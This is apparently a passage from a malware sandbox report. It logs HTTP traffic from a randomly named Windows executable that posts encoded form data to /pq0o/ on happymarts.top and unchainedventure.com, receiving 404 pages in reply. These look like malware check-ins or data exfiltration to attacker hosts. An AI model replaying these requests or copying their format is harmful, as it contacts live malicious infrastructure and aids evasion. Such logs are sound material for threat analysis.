Apr 24, 2024 09:21:58.250130892 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:21:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	203.161.46.103	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:00.780741930 CEST	10722	OUT	POST /pq0o/ HTTP/1.1 Host: www.happymarts.top Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.happymarts.top Content-Length: 10302 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.happymarts.top/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 31 57 71 44 4a 74 77 77 6a 38 2b 79 6b 76 43 6e 44 66 73 2f 59 56 76 54 42 71 70 37 6b 6c 37 56 7a 33 5a 6b 57 57 44 61 44 47 54 6c 4f 70 52 36 61 41 30 6a 48 72 59 2b 35 45 67 44 45 4c 61 47 6f 61 35 61 57 50 48 2b 4e 48 76 76 63 59 55 76 48 33 6d 61 46 39 4a 52 64 63 4b 57 35 4e 64 2b 56 63 2b 58 4b 43 75 41 79 55 77 34 45 39 31 41 39 6c 7a 4b 75 58 6f 62 65 65 55 79 4e 70 71 6b 4c 47 54 66 6b 59 45 71 54 4e 76 78 39 44 33 6b 46 7a 30 38 73 44 42 2f 55 42 62 38 6c 32 56 6c 2b 48 55 6d 77 69 33 31 79 34 4b 36 67 70 34 71 4f 66 76 64 77 71 69 66 70 67 5a 67 71 65 4e 63 6d 4a 6d 78 47 50 6a 65 48 4c 78 76 4c 4c 77 42 65 33 30 6e 72 72 48 32 72 36 61 65 48 2f 6f 31 46 65 4d 52 34 5a 46 4c 79 6c 78 2b 73 48 74 48 4b 2b 72 35 44 54 49 79 7a 30 4f 32 41 6d 2f 47 79 69 35 64 7a 61 4d 48 78 55 5a 36 4d 59 4a 43 47 68 74 4a 65 70 38 54 6b 38 39 43 67 2f 39 78 75 50 70 56 30 4d 52 59 6a 79 4a 54 45 43 64 68 4d 70 6e 31 71 63 79 4f 73 4a 5a 54 62 4b 58 6d 39 6a 39 7a 61 41 4d 56 4c 6f 78 38 76 41 34 47 41 6d 4a 47 59 35 4c 38 51 35 57 45 5a 4e 38 4b 6a 6a 50 79 2f 63 35 53 6f 57 78 6b 4f 6c 6c 72 54 44 78 39 45 6d 6e 71 54 36 45 50 37 76 5a 36 6e 63 4c 52 31 51 35 35 39 51 46 4b 50 71 49 61 64 2b 78 31 52 4a 7a 71 44 6c 6a 4a 6d 4c 48 6e 65 2f 58 4a 37 78 76 73 36 45 4f 43 6b 32 63 76 53 4e 69 6f 6f 2f 65 42 77 46 66 71 5a 77 57 54 2f 4a 74 46 79 6f 37 48 6d 7a 71 55 49 62 41 53 48 72 53 75 72 38 36 61 6f 77 79 56 59 32 50 30 2f 33 2f 49 34 72 6b 79 57 46 44 73 75 71 43 64 35 33 45 4d 72 31 69 76 6d 6d 6c 56 32 6d 39 75 39 75 30 65 41 55 45 69 64 6f 36 43 76 79 6d 7a 38 2b 70 6c 78 75 75 71 31 6d 67 4b 74 75 2b 62 69 2b 45 58 42 5a 49 65 70 64 4f 79 37 46 4f 54 4e 6a 51 50 62 51 76 4e 41 50 65 78 6f 71 44 50 61 4a 52 4f 6d 58 31 74 34 66 41 48 4a 6a 69 78 65 6c 57 66 32 69 2f 2b 4d 7a 33 56 71 69 48 58 6e 50 66 50 6d 7a 51 75 4e 4d 38 76 30 44 36 54 62 6c 44 76 53 49 42 73 4f 33 54 63 34 30 4f 37 59 48 55 41 64 69 61 32 36 73 2f 39 49 57 56 57 62 6c 4f 6d 6d 53 78 4f 4b 30 43 34 74 52 52 36 71 53 6a 46 50 4b 46 4b 7a 6d 67 2f 59 4b 64 4b 6f 63 74 4c 55 63 78 6c 45 67 6c 64 55 4e 48 4a 74 52 72 42 52 57 52 4b 75 39 45 4f 6c 4b 2f 49 4f 37 46 55 46 4c 37 64 30 53 76 75 44 34 45 62 79 6f 78 7a 32 39 2b 64 49 54 6e 2f 4b 69 69 4e 61 38 30 75 2f 76 59 54 30 36 39 48 4b 68 38 79 39 59 30 47 66 57 67 64 51 2b 46 2f 48 69 47 76 33 6f 50 36 56 64 55 72 33 63 50 35 49 73 67 69 74 39 37 45 78 52 47 52 78 61 63 36 76 66 44 51 52 43 65 76 35 6f 4e 78 46 61 51 69 54 5a 6e 69 33 61 6c 68 4b 78 30 4e 69 58 77 44 43 47 75 54 35 66 2f 67 61 70 2b 45 51 57 33 75 74 41 78 4a 79 30 43 69 37 54 6c 6d 72 41 70 75 38 58 68 49 79 4a 6f 45 71 32 42 61 4c 6b 69 69 4b 57 5a 6a 56 38 70 42 45 34 61 56 54 4d 71 62 4e 71 6a 6c 6a 4c 6d 62 76 6d 69 4d 50 75 2b 35 57 34 4f 73 4a 69 42 39 63 42 42 56 65 73 53 51 56 4a 42 73 61 33 76 47 71 39 53 6a 6d 59 4c 43 62 36 45 73 59 41 39 37 64 63 43 43 76 67 63 2b 45 52 32 75 62 44 32 72 68 53 35 36 4d 74 32 77 77 79 77 63 46 77 77 71 68 31 56 62 69 6b 5a 68 51 6f 5a 32 6f 39 53 34 42 45 52 79 32 77 49 59 47 67 61 73 38 51 70 63 72 77 76 4f 41 78 39 44 48 77 6c 63 36 70 31 4a 45 72 47 2f 70 67 79 57 79 77 75 2f 41 4a 71 6b 56 6f 47 31 51 6c 69 31 62 70 76 35 5a 49 77 64 35 79 4a 57 45 2b 53 56 6f 4c 70 66 6f 58 70 30 47 35 4d 42 62 79 7a 67 70 77 70 69 6d 33 70 4f 44 73 48 30 49 38 61 2b 65 47 44 72 49 6c 65 4c 44 37 62 78 37 69 4c 71 33 48 72 34 68 66 48 57 6a 42 69 6f 2b 31 52 4b 61 4a 36 56 63 71 49 78 6f 7a 58 4a 7a 6e 38 72 39 39 72 6e 58 39 70 73 77 62 56 71 34 39 6d 30 4a 2f 71 57 47 38 34 76 44 43 31 38 4b 70 71 66 41 78 38 34 46 4e 68 56 53 67 56 57 6f 50 36 67 79 4c 70 63 51 33 5a 4c 62 73 43 6e 47 74 54 42 36 64 37 4e 46 78 6d 42 33 4d 33 6a 53 50 77 54 52 4b 76 6d 2f 71 72 6f 76 4e 49 44 6b 58 68 6e 4a 31 57 6e 31 6d 47 43 42 61 42 6e 4f 34 72 4f 33 72 38 51 42 6e 4a 67 39 50 4b 52 73 2f 59 6a 6a 2b 64 33 71 6a 2f 6f 4b 31 31 54 4a 64 7a 48 74 2b 41 48 4f 63 42 67 71 32 70 6b 62 66 68 5a 65 6c 30 56 72 54 63 64 57 73 4b 51 56 65 6d 68 2b 73 2f 4e 57 49 73 41 73 75 54 73 6b 47 59 66 62 Data Ascii: F49hs=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
Apr 24, 2024 09:22:00.961513996 CEST	533	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:00 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	203.161.46.103	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:03.509206057 CEST	360	OUT	GET /pq0o/?9ZZXx=T6kxVZuXAVuH9J&F49hs=4UCjKZAQgLnMxNicE9pqcHmXIZhn5ynD4ggafyrMLg7tBb5+FldYarQ4uWITApeKqaBZVuXxHE31Fdk4aV2tLvZQCfORxMIFcNC7KFHj2TQuLtYW7VfXj0w= HTTP/1.1 Host: www.happymarts.top Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:22:03.692945004 CEST	548	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:03 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49756	195.242.88.141	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:10.247292042 CEST	638	OUT	POST /pq0o/ HTTP/1.1 Host: www.unchainedventure.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.unchainedventure.com Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.unchainedventure.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6c 77 59 66 6b 77 34 46 39 6e 47 4e 78 73 72 42 2b 66 70 65 35 4b 59 47 62 71 50 55 36 4e 38 64 30 59 74 39 35 45 73 61 48 77 4c 65 42 77 64 2b 39 66 43 78 58 69 5a 31 69 6f 7a 64 77 39 75 59 47 57 57 6c 71 44 6f 33 42 73 47 33 74 68 69 78 38 39 79 41 2b 63 52 48 5a 79 72 32 4d 63 77 65 33 79 62 4a 5a 4d 34 77 79 38 38 63 7a 2b 67 7a 33 79 2f 43 6c 2b 61 78 4f 6d 2f 6c 52 32 77 35 78 49 4e 4c 43 59 35 62 77 54 33 45 52 4f 4e 6e 6e 66 74 31 6b 79 56 70 51 38 45 65 79 62 4b 77 53 71 4d 67 48 68 38 77 36 68 34 4e 7a 6e 52 7a 37 6f 67 31 70 58 63 45 71 6e 57 2f 41 35 6f 55 53 77 3d 3d Data Ascii: F49hs=lwYfkw4F9nGNxsrB+fpe5KYGbqPU6N8d0Yt95EsaHwLeBwd+9fCxXiZ1iozdw9uYGWWlqDo3BsG3thix89yA+cRHZyr2Mcwe3ybJZM4wy88cz+gz3y/Cl+axOm/lR2w5xINLCY5bwT3ERONnnft1kyVpQ8EeybKwSqMgHh8w6h4NznRz7og1pXcEqnW/A5oUSw==
Apr 24, 2024 09:22:10.573885918 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 24 Apr 2024 07:22:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49757	195.242.88.141	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:22:13.111736059 CEST	658	OUT	POST /pq0o/ HTTP/1.1 Host: www.unchainedventure.com Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.unchainedventure.com Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.unchainedventure.com/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 6c 77 59 66 6b 77 34 46 39 6e 47 4e 7a 4d 62 42 74 38 42 65 38 71 5a 30 46 36 50 55 30 74 38 5a 30 59 68 39 35 46 34 77 48 43 76 65 42 53 46 2b 76 4d 61 78 55 69 5a 31 70 49 7a 59 74 74 75 70 47 57 72 61 71 47 51 33 42 73 43 33 74 6b 65 78 2f 4d 79 44 2b 4d 51 68 55 53 72 30 42 38 77 65 33 79 62 4a 5a 4d 74 64 79 38 6b 63 77 4f 77 7a 77 6d 72 42 6f 65 61 32 59 32 2f 6c 47 6d 77 44 78 49 4e 35 43 5a 6c 78 77 52 2f 45 52 4c 4a 6e 6e 4c 78 79 78 43 56 76 50 4d 46 66 6a 65 2f 49 4b 36 35 7a 5a 77 77 4e 37 46 4d 54 32 68 41 70 71 5a 42 69 37 58 34 33 33 67 66 4c 4e 36 56 64 4a 78 58 49 74 6d 41 46 4b 4b 48 53 68 2f 6c 6d 31 64 2f 46 75 31 63 3d Data Ascii: F49hs=lwYfkw4F9nGNzMbBt8Be8qZ0F6PU0t8Z0Yh95F4wHCveBSF+vMaxUiZ1pIzYttupGWraqGQ3BsC3tkex/MyD+MQhUSr0B8we3ybJZMtdy8kcwOwzwmrBoea2Y2/lGmwDxIN5CZlxwR/ERLJnnLxyxCVvPMFfje/IK65zZwwN7FMT2hApqZBi7X433gfLN6VdJxXItmAFKKHSh/lm1d/Fu1c=
